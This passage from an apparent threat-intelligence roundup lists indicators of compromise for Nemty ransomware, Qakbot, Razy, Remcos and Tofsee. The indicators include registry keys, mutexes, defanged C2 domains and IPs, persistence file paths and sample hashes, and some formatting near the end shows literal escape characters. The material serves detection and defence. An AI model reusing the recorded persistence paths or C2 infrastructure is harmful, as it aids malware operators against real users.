1a99329960098a5414c2fac1bad96ef143878fb5435bcdc6cef9d288081e8b4b
1d2d031f33ce5adea4a45c700e29e99903d55850481fb17deb479fe47d367a18
1e4294a2b465e27903582116b12d5db2a6999116e27c698b5b98ae52035649b7
1ee6e03bfe259cf4a95c093e85056ae9807fa53f83f465b8878d74a114f148fd
2164d2a4c1a861298c8003118855be9ae68614c5e557638830038658b2e6e47c
22d18aa907e4750c7fce359140c44db444c644e8576c8609ca54c2e85afa0ac7
234bcafc5700b9f59d30bbcd0b7ba4694e49ffe6621ed63a5a6f0464a6aba447
25a297586142486627a765200bfc30658cdb4500949c581a83d1be262c60c4c6
25ae0f8e3b3938131d098ff7832167a5b6629e6cb8972827b7f1175b69e063c9
2651e9bbd4004b56eefa43f4f7ffd982d16d07df2980423cb54b1ee585172ae5
274d2074201aabff30008390fbc34087fc9aead9ec924d18708a0d6670bb6995
276f56271a9b3e3fcce07ccd2e4dab2a4316b90e8e715e2657b572da0109c801
2a7ad044e7f131e71e794cc8dd31ce746f455d9c53e45b88c3696891f4f11b35
2bb8a6eae8695c55070f5f78371609052f73826a2df29a9e2ab82c7c89603369
2cecccc835e1485e21cc45c86571f82f06223e422f59410228c140e77862ef3a
2d239ffa8b5e13e8c19de06e5d5825e24df4c52f31741ab7373b2b74b612ab2f
```

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | 
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | 
WSA | 

#### Screenshots of Detection

 * [AMP](<https://1.bp.blogspot.com/-4FVaIANFD4I/XlARnD1EhfI/AAAAAAAADUU/-lAGQkXWhkAxzdivKR5_M1-45dpGp1_eACLcBGAsYHQ/s1600/ae3798e9a455f50c9911c3a1ee08f59ef5da4e74833678e7ddbea1ebbedb465c_amp.png>)
 * [ThreatGrid](<https://1.bp.blogspot.com/-HneYB_RfzF4/XlARrvh7zqI/AAAAAAAADUY/CXOa9fTdCRYHT5nqmfqP8mMVVCMsfF-nACLcBGAsYHQ/s1600/ae3798e9a455f50c9911c3a1ee08f59ef5da4e74833678e7ddbea1ebbedb465c_tg.png>)
 * [Umbrella](<https://1.bp.blogspot.com/-snANC_HV5ro/XlARvxUSXwI/AAAAAAAADUc/HqVmeLBjI9gWDZbUQDhX3VoLEvzhSaRGQCLcBGAsYHQ/s1600/ae3798e9a455f50c9911c3a1ee08f59ef5da4e74833678e7ddbea1ebbedb465c_umbrella.png>)

* * *

### Win.Packed.Mikey-7586709-0

#### Indicators of Compromise

 * IOCs collected from dynamic analysis of 16 samples

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DEFAULTICON` | 4
`<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\75E0ABB6138512271C04F85FDDDE38E4B7242EFE` Value Name: `Blob` | 4
`<HKCU>\SOFTWARE\NEMTY` | 4
`<HKCU>\SOFTWARE\NEMTY` Value Name: `fid` | 4
`<HKCU>\SOFTWARE\NEMTY` Value Name: `pbkey` | 4
`<HKCU>\SOFTWARE\NEMTY` Value Name: `cfg` | 4
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS` Value Name: `C:\Windows\SysWOW64\unbhgouj` | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\UNBHGOUJ` | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\UNBHGOUJ` with Value Name `Type`, `Start`, `ErrorControl`, `DisplayName`, `WOW64`, `ObjectName`, `Description`, `ImagePath` | 1 each
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES` | 1
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES` with Value Name `Config0`, `Config1`, `Config2`, `Config3` | 1 each

Mutexes | Occurrences
---|---
`Global\<random guid>` | 7
`Vremya tik-tak... Odinochestvo moi simvol...` | 4
`A16467FA7-343A2EC6-F2351354-B9A74ACF-1DC8406A` | 3
`A238FB802-231ABE6B-F2351354-CF072D6D-090D08F1` | 1
`chv8VoF8462A240TQszdiFeaRyFs610A` | 1
`A238FB802-231ABE6B-F2351354-7FCA0C5B-B9CFE7DF` | 1

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`172[.]217[.]164[.]179` | 3
`172[.]217[.]7[.]243` | 2
`104[.]26[.]4[.]15` | 2
`46[.]29[.]160[.]26` | 2
`104[.]26[.]5[.]15` | 2
`194[.]116[.]162[.]29` | 2
`91[.]215[.]170[.]234` | 2
`46[.]4[.]52[.]109` | 1
`104[.]47[.]36[.]33` | 1
`43[.]231[.]4[.]7` | 1
`93[.]171[.]200[.]64` | 1
`67[.]195[.]228[.]110/31` | 1
`168[.]95[.]5[.]112/31` | 1
`168[.]95[.]5[.]216/30` | 1
`168[.]95[.]5[.]118/31` | 1
`172[.]217[.]197[.]26/31` | 1
`98[.]136[.]96[.]76/31` | 1
`203[.]15[.]169[.]11` | 1
`67[.]195[.]204[.]73` | 1
`85[.]114[.]134[.]88` | 1
`67[.]195[.]204[.]75` | 1
`67[.]195[.]204[.]80` | 1
`98[.]136[.]96[.]92/31` | 1
`134[.]0[.]12[.]89` | 1
`198[.]35[.]20[.]31` | 1

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`www[.]myexternalip[.]com` | 4
`nemty10[.]hk` | 4
`api[.]db-ip[.]com` | 4
`0300ssm0300[.]xyz` | 3
`ghs[.]googlehosted[.]com` | 2
`smtp[.]secureserver[.]net` | 1
`ipinfo[.]io` | 1
`api[.]pr-cy[.]ru` | 1
`mx-aol[.]mail[.]gm0[.]yahoodns[.]net` | 1
`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 1
`centrum[.]sk` | 1
`post[.]sk` | 1
`msx-smtp-mx1[.]hinet[.]net` | 1
`www[.]google[.]no` | 1
`damstein[.]no` | 1
`clayvard[.]com` | 1
`oppdal-booking[.]no` | 1
`luthgruppen[.]no` | 1
`gjestal[.]no` | 1
`claytonwright[.]co[.]uk` | 1
`hxqk[.]sk` | 1
`lovetts[.]com` | 1
`upkm[.]sanet[.]sk` | 1
`loveumail[.]com` | 1
`vae[.]sk` | 1

*See JSON for more IOCs

Files and or directories created | Occurrences
---|---
`%TEMP%\CC4F.tmp` | 7
`%TEMP%\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 6
`%TEMP%\<random, matching '[A-F0-9]{4,5}'>.dmp` | 6
`%HOMEPATH%` | 5
`%ProgramData%\Microsoft\Windows Defender\Scans\CleanStore\Resources\<xx>\<sha1>` for `01\0119C23D88292A0E4FEC04D5CF8629005A44E37C`, `17\17542707A3D9FA13C569450FD978272EF7070A77`, `1A\1A141DBFA4083406630DD9A81AD35C416F604800`, `47\47267F943F060E36604D56C8895A6EECE063D9A1`, `95\954D59EAEADC36CB19A224A5DDDFA1EDCFDC49CE`, `A2\A2C4E53F8E58DC61E337D4CFBBDFBF5BA2825852`, `A5\A5B16A7D28D2BA79A9CCFC16ED480AD75A757166`, `AF\AF210C8748D77C2FF93966299D4CD49A8C722EF6`, `B0\B066A9B35AE0BB605431AC8740DEA2A659EED4C4`, `D3\D34ED774F9FDCBA938A7807BD8FB1B398C51BC81` | 4 each
`%ProgramData%\Microsoft\Windows Defender\Scans\History\Results\Quick\{69EB062C-C99C-4979-B7E6-36430B258597}` | 4
`%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2580483871-590521980-3826313501-500\518e2bc94bc324e5e6f82437175ae1af_d19ab989-a35f-4710-83df-7b2db7efe7c5` | 4
`%ProgramData%\Microsoft\User Account Pictures\Administrator.dat` | 4
`%ProgramData%\Microsoft\Windows Defender\Scans\CleanStore\LastBld.dat` | 4
`NEMTY_GBF756G-DECRYPT.txt` dropped in `%APPDATA%`, `%HOMEPATH%`, `%HOMEPATH%\Desktop`, `%HOMEPATH%\Documents`, `%HOMEPATH%\Downloads`, `%HOMEPATH%\Favorites`, `%HOMEPATH%\Links` | 1 each

*See JSON for more IOCs

#### File Hashes

```
0b02eb48cb0b7e88d3c5c6d6b6366dedc8d29f13e8ef252d768ce5f0acf3e6b7
2d2c2363a77afa2a914cf77e684cd279150bef2e5f5c27ba45e2be26b094d6e9
31145485a77c5167d0b01834793203c7f03e4298e532712773700f853bf494d5
4ed113b1e3967eea8beec9ac8b23017a25938dda53822c51c21d30c71a946660
53279dd8f9c45b2e213d4925c5a59cc0297a3446d566cb4eb2825b5042d912a9
7475233e2a3836d3a8b69fc76450cda8770beb5e61da095fb108898ef9bca0fb
7f944fc983d8100caf59f4918239e6d83f0cb2a498ea3f48e8623b3cebcc3250
944006ef7abb2e02f87ddafd0e50f8e3c600d3914462d6216027f5c5dd8db475
9f2a258a72368901ac1f99e7d0eadf62a85a2d33c56d3dca3d1406244dd0713a
a30e02134af6767d48793d1ac857d428b11380fa6c2f4898918b1b3ed2012700
a969b88015cf14ae1b50cc903e82b75d754deddbca2a2bb1a39db4c6cf447c12
a9f6d5ad40d5b073be92fc46666ce1f96e30c50494a018d472cfee56ff2b8c65
cbe96c19bc6246b4c85242e87b74481be23ac7bebe61aea6b34ff7deb8f17275
d74cc221d6ab6e29b7049ab7f49a6ac80c9cde20ca7f4db31e128037f1bf9d4d
dba02f5167986887ab29070b468c15bbc15d79942d62c8f9bcf95546c461d128
f15065bb9747e1c9a7f2bb41e80efdc2ef0435ac1f5b649d11c7537fa9095eba
```

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | 
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | 
WSA | 

#### Screenshots of Detection

 * [AMP](<https://1.bp.blogspot.com/-UWzSCz2Srx0/XlASAKow2II/AAAAAAAADUo/fJipPUI6b0g0c8ZY6ZsizUtAw9MWTWZ8ACLcBGAsYHQ/s1600/0b02eb48cb0b7e88d3c5c6d6b6366dedc8d29f13e8ef252d768ce5f0acf3e6b7_amp.png>)
 * [ThreatGrid](<https://1.bp.blogspot.com/-1Jo16dCDs10/XlASDXotNNI/AAAAAAAADUs/aw-ynvd2dRoijKqRKfAqB9xav0JR4QA-gCLcBGAsYHQ/s1600/0b02eb48cb0b7e88d3c5c6d6b6366dedc8d29f13e8ef252d768ce5f0acf3e6b7_tg.png>)
 * [Umbrella](<https://1.bp.blogspot.com/-AoxHQu44ypg/XlASGwV2AtI/AAAAAAAADUw/VrIUSZTMrzcEseWsPU2SwDovyfXw066FQCLcBGAsYHQ/s1600/0b02eb48cb0b7e88d3c5c6d6b6366dedc8d29f13e8ef252d768ce5f0acf3e6b7_umbrella.png>)

* * *

### Win.Malware.Qakbot-7586710-1

#### Indicators of Compromise

 * IOCs collected from dynamic analysis of 17 samples

Mutexes | Occurrences
---|---
`ocmwn` | 17

Files and or directories created | Occurrences
---|---
`\TEMP\7dcd176143285b60a9dda1499593d0e2.exe` | 1
`\TEMP\7119a1ba9e8866f9aca5360c337aa099.exe` | 1
`\TEMP\8d6ac636eb8758ef5c1820e457f6f4c3.exe` | 1

#### File Hashes

```
16e98279914ef3280950a2cba389e0aced7bc38d45db4f4e3b516bab17de41b2
2194ff71108712b66905dc46155aada3b0c5e56986e7db97f50b1dc5055aa41f
279be64e1b80827ebc2187f76914b57d8ce6fc14aa70ee908c8e29c1a6177f8a
2b8c204a35189a6937aa9740820a4ac6caf7ca372656d20d8bfc9f8583f02081
3cb499f2bb1838ad8066bae7254fa012a2b7ba4270ae284774537093898beda2
44b234565a5590957845f1c4e14e7c81ab5be8a9ae0d19a1f4e04ebcf67be907
46ab34a52c0e0f8a6cfb302d38085924f55e7a0d37c5bf8cd6b503ea83a2055e
58225241e8f436355e2cc739127490ad8a88d6d47620c727a26e56c5c1e786e0
5afa22c50fd430fed4f06437dcdb74248bc40917dd6a4f4844137528ae186aaa
8c17ae11559298aa36b6837b9e6a2f4fcee5a083004ea6463aa9384c04d016f3
abe179259e363dad7ab393685c3dd711550a9f8aa7fe5344de8141723352b0de
b053b3570129f906cf09d2a63d034f724fd3d561d991fec761133c1cfe568ef6
b8a80038ab33b7a556f3b1e47cadfddc417d7301ee62c0a87610ab635e60360a
bf052b65100259f2a13c98a20aad8f8bd8688a07639530aa12159200fb39c504
d6b4f5ce244ce922fbed636528ad6deb7ca306f543400657b5e07dc0ffd6521f
db037e58c1bc214b4853bff0aedd8ba22a5ab60e37b127178fb36547b2124051
dc01374a8e4b46e82f3efc130065b8e7a93bdb537ece13e02ac303a881b138ac
```

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | N/A
WSA | N/A

#### Screenshots of Detection

 * [AMP](<https://1.bp.blogspot.com/-4o9mTNwWLmA/XlASV1IC1wI/AAAAAAAADU8/533byX6vO1I7xOlnlgSryN9s9Ojtb1D7ACLcBGAsYHQ/s1600/279be64e1b80827ebc2187f76914b57d8ce6fc14aa70ee908c8e29c1a6177f8a_amp.png>)
 * [ThreatGrid](<https://1.bp.blogspot.com/-FGrkAdr1_Ac/XlASZuJEl4I/AAAAAAAADVE/vY-ngbrNagsZ47DblO6CVDXyMJXJfyemACLcBGAsYHQ/s1600/279be64e1b80827ebc2187f76914b57d8ce6fc14aa70ee908c8e29c1a6177f8a_tg.png>)

* * *

### Win.Malware.Razy-7588195-0

#### Indicators of Compromise

 * IOCs collected from dynamic analysis of 54 samples

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\TOOLBAR` Value Name: `Locked` | 1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\HOMEGROUP\UISTATUSCACHE` Value Name: `OnlyMember` | 1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\HOMEGROUP\UISTATUSCACHE` Value Name: `UIStatus` | 1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER` Value Name: `CleanShutdown` | 1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{509D0DCA-5840-11E6-A51E-806E6F6E6963}` Value Name: `Generation` | 1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{6DD1DC5F-5840-11E6-B80E-00501E3AE7B5}` with Value Name `Data`, `Generation` | 1 each
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{3F37BA63-EF5C-11E4-BB8D-806E6F6E6963}` with Value Name `Data`, `Generation` | 1 each
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\CPC\VOLUME\{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}` with Value Name `Data`, `Generation` | 1 each
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APPLETS\SYSTRAY` Value Name: `Services` | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NLASVC\PARAMETERS\INTERNET\MANUALPROXIES` | 1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CD BURNING` Value Name: `CD Recorder Drive` | 1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CD BURNING\DRIVES\VOLUME{509D0DCA-5840-11E6-A51E-806E6F6E6963}` with Value Name `Drive Type`, `IsImapiDataBurnSupported` | 1 each
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CD BURNING\DRIVES\VOLUME{509D0DCA-5840-11E6-A51E-806E6F6E6963}\CURRENT MEDIA` with Value Name `FreeBytes`, `Blank Disc`, `Can Close`, `Live FS`, `Disc Label`, `Set` | 1 each
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CD BURNING\STAGINGINFO\VOLUME{509D0DCA-5840-11E6-A51E-806E6F6E6963}` with Value Name `DriveNumber`, `StagingPath`, `Active` | 1 each

Mutexes | Occurrences
---|---
`B4BBD0F7883AF46401A8F944D11D8E1698B68E3C` | 40
`Global\<random guid>` | 7
`opera_shared_counter64` | 2
`opera_shared_counter` | 2
`<32 random hex characters>` | 2
`{C20CD437-BA6D-4ebb-B190-70B43DE3B0F3}` | 1
(empty mutex name) | 1

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`104[.]129[.]67[.]170` | 22
`104[.]129[.]67[.]168` | 18
`72[.]22[.]185[.]198/31` | 2
`185[.]53[.]179[.]7` | 1
`185[.]222[.]202[.]91` | 1
`62[.]149[.]210[.]9` | 1
`185[.]35[.]137[.]147` | 1
`185[.]61[.]148[.]224` | 1

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`www[.]msftncsi[.]com` | 40
`ligue1[.]shop` | 2
`klub11n[.]us` | 2
`jong37[.]pw` | 2
`klub046[.]co` | 2
`ijust1fy[.]pw` | 2
`ktfr34ks[.]pw` | 2
`son0fman[.]pw` | 2
`jsbook[.]info` | 2
`js0c892[.]se` | 2
`iyfsearch[.]com` | 1
`ligue1[.]fun` | 1
`www[.]mac-pro[.]it` | 1
`j5cool[.]xyz` | 1
`sm0osh[.]xyz` | 1
`jo1b9[.]co` | 1
`lip616[.]co` | 1
`lip4u5[.]se` | 1
`jsoc8492[.]us` | 1
`jo15y[.]xyz` | 1
`l0vew1n5[.]xyz` | 1
`snd616[.]co` | 1
`dill10n1[.]pw` | 1
`j0011y[.]pw` | 1
`j0nhy[.]pw` | 1

*See JSON for more IOCs

Files and or directories created | Occurrences
---|---
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\sessuawh.lnk` | 40
`%APPDATA%\Microsoft\Windows\sessuawh` | 40
`%APPDATA%\Microsoft\Windows\sessuawh\jisgivdt.exe` | 40
`%APPDATA%\Microsoft\Windows\sessuawh\sessuawh` | 2
`%System32%\Tasks\Opera scheduled Autoupdate <n>` for n = 3131961357, 3115184141, 2980966669 | 4 each
`%System32%\Tasks\Opera scheduled Autoupdate <n>` for n = 3130913037, 3130912781 | 3 each
`%System32%\Tasks\Opera scheduled Autoupdate <n>` for n = 3131961405, 3004035085, 3131109389, 3131962125, 3131961349, 3127767149, 3007180813 | 2 each
`%System32%\Tasks\Opera scheduled Autoupdate <n>` for n = 2989355021, 1044487932, 3131961552, 3131963261, 2980966925, 2989726024 | 1 each
`%TEMP%\7CE0.dmp` | 1
`%TEMP%\WPDNSE` | 1
`%LOCALAPPDATA%\Microsoft\Windows\WER\ERC\statecache.lock` | 1

*See JSON for more IOCs

#### File Hashes

```
002f27cf7d9185bd0c0ee1c363a221be80e797db81f25e1abb9898de6906c6b6
00de50e39e76fe23df42f435dfe0c0571b41c06a4337f15dc0c70ef28182c332
03759da14ffcd558e1b492286a1f04cce519995b591a848ee4e76b1a00f9bfbd
038a84e68adbb095a8ad39ced3de6407f977113fee99c46c6e87dc7c2c66d739
070ef4de5fe79fe29dfb5d3db253ec2c4b6e20797116b608cbbadb110afc54d1
07ed129012419a5c63e2987883653f7781ccc214f2abe3580b3baac5df397b88
08f442c4d7bcbbfbed9cf39ed382529fdb1368f2cd8e8d88d39a987b566b705a
096add794410c4bc72ef29cebfba05db27ca895f9136eba710cf45ad3492e37d
0c260a56652727b6dd9e280cb741870e61b9c1a8fe54dad0e12b42b2163eb391
0ec389eaa5253a5477aff5a36b5af41a76430cc41a4231dba9dab9587650e36b
11c15bc5878e34eb98b320aa9d7dbe6fb71987603cec86d39c1d7a902e3b5eef
198501a9810da38bb19dc1e0f4dd3a669a86fa57165075485cebf6e7662600e7
1ac2a34d85e02dc74dc1f612d06634d160fd29e359d45b8a50ccc3bbd78c3975
20dd29c3c7271b2d44600e7896dc3e351e8d53b583f9535104fe9cca3077d219
21633fd3deaa6b4a8bb9095f3d396c894a0a8648edbd85919d4589068327c3b0
2c6a0eb320df561009681342b3ccb1dd8a585968ec0932716553389f19d0b620
2fa0184c94b5220ec52d03e99eaa43b00ee78ef956f4c3a5b09bb7dca8270f47
3563013bf168f3021b42950648dd8175e51baeea1f9b6f1a9c8dfe2fb28b0187
383dede6a6d363e97a2d34a002aca69378da4b6769b13976b0344a20272a7d9d
3d51cff2d7fe5c108b765525081c3c0ec62811d6fd8f6d1e8f7ccb23ce1b5160
40c184b47b2d4d52ab39aab7c81b9e80b85948e6321989eed2e071a2346c836e
41e87e94d52d08cd7d82e052a72b598421dbd469d676cfb58640521a15ec0eed
533418f5d648f0a9855adbea0b6001531d8ea6687db27e1ddc0a157174cbc605
560df0484842e569cf4ec7a3c9b6942fbab8a5e5ef1bf8516baa6317841aa4bf
586303e0a91cd70a44b2311a081462b396f0e57cd948edf0fa97a4896eb830a4
```

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | 
WSA | 

#### Screenshots of Detection

 * [AMP](<https://1.bp.blogspot.com/-QzeeOF7y_s8/XlAVZtosioI/AAAAAAAADVQ/uAsSM7h5iC0uJ28blJbVHgifsZcECTuegCLcBGAsYHQ/s1600/383dede6a6d363e97a2d34a002aca69378da4b6769b13976b0344a20272a7d9d_amp.png>)
 * [ThreatGrid](<https://1.bp.blogspot.com/-mZg_D4XEh-o/XlAVc8KNJfI/AAAAAAAADVU/4Il6PjInA34KEsOQT76GckMI47dkyaOawCLcBGAsYHQ/s1600/383dede6a6d363e97a2d34a002aca69378da4b6769b13976b0344a20272a7d9d_tg.png>)
 * [Umbrella](<https://1.bp.blogspot.com/-KTXDpx3Enwk/XlAVjC8EmpI/AAAAAAAADVY/2tZKt67yb1IvszgN6qoG6PstQeGMGdSxgCLcBGAsYHQ/s1600/ec64f644457a610df9de78b5b27074a8652a163a4ef5917157f889baeee69fd6_umbrella.png>)

* * *

### Win.Packed.Generickdz-7586813-0

#### Indicators of Compromise

 * IOCs collected from dynamic analysis of 37 samples

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\REMCOS-ZUXZLQ` | 4
`<HKCU>\SOFTWARE\REMCOS-ZUXZLQ` with Value Name `licence`, `exepath` | 4 each
`<HKCU>\SOFTWARE\REMCOS-V1R5VH` | 2
`<HKCU>\SOFTWARE\REMCOS-V1R5VH` with Value Name `exepath`, `licence` | 2 each
`<HKCU>\SOFTWARE\REMCOS-6PU1BX` | 1
`<HKCU>\SOFTWARE\REMCOS-6PU1BX` with Value Name `exepath`, `licence` | 1 each

Mutexes | Occurrences
---|---
`QSR_MUTEX_ayVRCIIhAhYn6ZIdtI` | 17
`Remcos_Mutex_Inj` | 7
`Remcos-ZUXZLQ` | 4
`3749282D282E1E80C56CAE5A` | 2
`Global\{b1324b26-be01-4620-bf4b-b68b0ae0f95b}` | 2
`Remcos-V1R5VH` | 2
`57926c4f-8f06-4a2d-a8d5-a3428f4894fd` | 1
`Global\8e50a541-4f19-11ea-a007-00501e3ae7b5` | 1
`Remcos-6PU1BX` | 1

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`208[.]95[.]112[.]1` | 17
`46[.]105[.]98[.]53` | 17
`79[.]134[.]225[.]123` | 2
`209[.]127[.]19[.]34` | 1

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`ip-api[.]com` | 17
`variakeburne[.]ddns[.]net` | 4
`randydidier2468[.]ddns[.]net` | 2
`renaj2[.]ddns[.]net` | 2
`worldatdoor[.]in` | 1
`kitchenraja[.]in` | 1
`sixteen147[.]ddns[.]net` | 1

Files and or directories created | Occurrences
---|---
`%APPDATA%\Logs` | 17
`%APPDATA%\Microsoft\System32.exe` | 17
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\System32.vbs` | 17
`%APPDATA%\Logs\02-14-2020` | 17
`%APPDATA%\<random, matching '[a-z0-9]{3,7}'>` | 13
`%APPDATA%\remcos\logs.dat` | 7
`%TEMP%\96f91905-b339-4638-bd86-c6a77cf058d3` | 4
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\appsdatas.exe.vbs` | 4
`%APPDATA%\appsdatas` | 4
`%APPDATA%\appsdatas\appsdatas.exe.exe` | 4
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\yfgr.exe.vbs` | 4
`%APPDATA%\jnxc\yfgr.exe.exe` | 4
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\lmwq.exe.vbs` | 3
`%APPDATA%\hcek\lmwq.exe.exe` | 3
`%APPDATA%\D282E1\1E80C5.lck` | 2
`%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2580483871-590521980-3826313501-500\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5` | 2
`%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5` | 2
`%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs` | 2
`%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator` | 2
`%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat` | 2
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\daxp.exe.vbs` | 2
`%APPDATA%\gnwk\daxp.exe.exe` | 2
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs` | 1
`%APPDATA%\appdata\update.exe` | 1
`%TEMP%\637172179772244000_d1934800-c529-4e3b-afff-37bcc71b45d4.db` | 1

*See JSON for more IOCs

#### File Hashes

```
08ce5d7fc0de04906c1c24dc0d72d279dbd125b61d4ff3361e5f960d3441e421
0a603c32a8e16c81e314e9030a6e6d45055ae5f93ca819121ba6538660fe3072
0c4b27461dbd294c5a6a3851051ab5ff3ecf6b6aa72b7588ba59a7381632f06e
12a2568481ee9eca1ccb7a522f5853a7b0aa30ed56abfa5d3f1a2168865f390a
13ac030d6a53c594e08ffb80140b43fcad93841e170be5d8043e9f4b1512ea7e
1514b3e4e3c01eae8d55693255f12c5efd68549491c007425b6cac2465ec07b2
16a94d5de704b8166684143480c0c93c522751eba3acc8a79d468d0e7b579a9e
17309647cddb67ae9146b2746461e0152240808f88231c790dfcf923a7b717a2
1fbc7923dbc28f31aed3114f6ae66cd7431b78639b0998af963f606dd430dd41
1fde04dd38b0e62c6e39c9cf83d946052d665ab43be1aad712c665d4f216becf
2766c878553e8b7fae74b133be1880b6a345ade8284d919717d0ca6427e85a38
2ae7fe445fcc08eb3179519a41aea3fb7310e33973af114efd17dfa8653cbc5d
2b70abdaf78867285774c432c365ad6a7ab5777f0eda50d9c202205fcfe576d5
30b44cab6a839ae845647b0d608f645cc44bf01af6d5a9b53aae92e46bc12159
312915777632ef010f7a3bb2c60c274ea7c6d3f195349efac5e1057f6ec8a46a
3328f4ca20a50c85d8ddb77e20b54822bb44c7fc7dfbaab279fcf39389a50355
35ed04364daa9a21e306204ea27f1d7186248a8ab6bbc03ab202fb8d6f998a05
38f23b5da8cba1044efabbf1bbdb29d0fc748206ff5709a9c8c0fc553c21418c
3e50718cfffca7db327d35011301206ce21a7103f6a68bd78859a666e5781f42
4124aa54761859ab9d92cb3d50a64e461c5fe76b70b0839e933117fdb91391f0
48a1f2cf546a630bc763375052b734d4d1bd8d121e440a1718ec2c09d1605f57
4b388553f1b23e229fed441a7ada1afd2a87dfb1e77dc43d86f86b4028c2d46a
553e69e62475f74dcf2762e5499167539ae77df7692f0967cc1f9408d0bd8ae4
557e52d63114622d6adec38238bdf81d944d66389b07ddbe542fb8799b8d0b3e
5d3a4d8448e8af881bb3f82ed0d34735491c076c7c7f1f642431ec2777f4dec9
```

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | 
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | 
WSA | 
\n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-1cZLfIv8gHk/XlAWPwqHT9I/AAAAAAAADVo/oHcV78z8ePMREWOuTNdzyHP-z3NqmFQQACLcBGAsYHQ/s1600/30b44cab6a839ae845647b0d608f645cc44bf01af6d5a9b53aae92e46bc12159_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-a4Y0P4O5X6U/XlAWUT53BJI/AAAAAAAADVs/iEInF4WtvXgAr0_uAfvnFHm9W0SIp7hUQCLcBGAsYHQ/s1600/d21da138cac8528e6e2160b8ea8b56749c0d5300994af27283f238c8a46607c8_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-bO0MXTuuCbM/XlAWZ7YOyfI/AAAAAAAADVw/dt7PgqGhwnILvQc4m50G23tEDjasMNByQCLcBGAsYHQ/s1600/35ed04364daa9a21e306204ea27f1d7186248a8ab6bbc03ab202fb8d6f998a05_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Tofsee-7586819-1\n\n#### Indicators of Compromise\n\n * IOCs collected from dynamic analysis of 18 samples\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES ` | 18 